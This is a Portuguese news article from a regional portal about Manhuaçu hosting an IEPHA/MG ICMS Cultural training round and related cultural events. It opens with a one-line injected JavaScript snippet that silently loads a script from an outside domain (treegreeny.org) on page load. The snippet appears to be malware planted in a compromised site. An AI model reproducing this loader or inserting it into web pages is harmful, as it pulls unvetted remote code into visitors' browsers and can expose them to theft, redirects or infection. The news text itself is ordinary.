;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu sedia rodada do ICMS Cultural. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu sedia rodada do ICMS Cultural.

A cultura em Manhuaçu tem sido tratada como uma das prioridades pelo atual Governo municipal. A busca pelo resgate cultural da população manhuaçuense foi uma das grandes missões dadas ao diretor municipal de cultura, Sebastião Januário de Moraes, pelo Chefe do Executivo, Nailton Heringer.
Com a intenção de voltar a receber e promover grandes eventos culturais, colocando em destaque os artistas do município, o Departamento Municipal de Cultura de Manhuaçu, trouxe para a cidade três grandes eventos em parceria com o Governo de Minas.
No último dia 27 de março, a cidade recebeu o Painel Música Minas, que mostrou aos músicos e artistas, grandes oportunidades, dadas pelo Governo de Minas por mio de programas voltados para o interior do Estado.
ICMS
Outros dois grandes eventos aconteceram neste no último fim de semana. Além do belo espetáculo da música popular brasileira, SESC Chorinho e Samba na Praça, ocorreu a Rodada do ICMS Cultural, promovida pelo IEPHA – Instituto Estadual do Patrimônio Histórico e Artístico de Minas Gerais, nesta última sexta-feira, 12. A iniciativa se deu em parceria com o Governo do Estado, a Câmara de Vereadores e Prefeitura de Manhuaçu. O objetivo foi orientar os gestores municipais de cultural sobre a importância do ICMS Cultural, programa estadual de proteção ao patrimônio cultural, que gera repasse financeiro aos municípios.
Na cerimônia de abertura, compuseram a mesa principal, a equipe do IEPHA/MG, com Marília Palhares Machado, diretora de promoção, Alessandra Deoti e Silva, gerente de cooperação municipal, e Beatriz Chimaco, urbanista e arquiteta, o diretor municipal de Cultura de Manhuaçu, Sebastião Januário de Moraes, o presidente da Câmara dos Vereadores de Manhuaçu, Maurício Junior, e a presidente da Academia de Letras de Manhuaçu, Abla Slaib Pereira. Logo após os pronunciamentos, houve uma belíssima apresentação cultural de capoeira e maculelê, feita pelo grupo Corpo & Ginga.
Durante o encontro, foram esclarecidas dúvidas sobre as tarefas a serem desenvolvidas e documentadas pelos municípios e sobre os encaminhamentos da documentação que é entregue ao IEPHA/MG, em dezembro. No evento, compareceram diretores culturais e gestores municipais de cerca de dezessete municípios da Zona da Mata de Minas Gerais.


Informação: Arthur Rocha

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.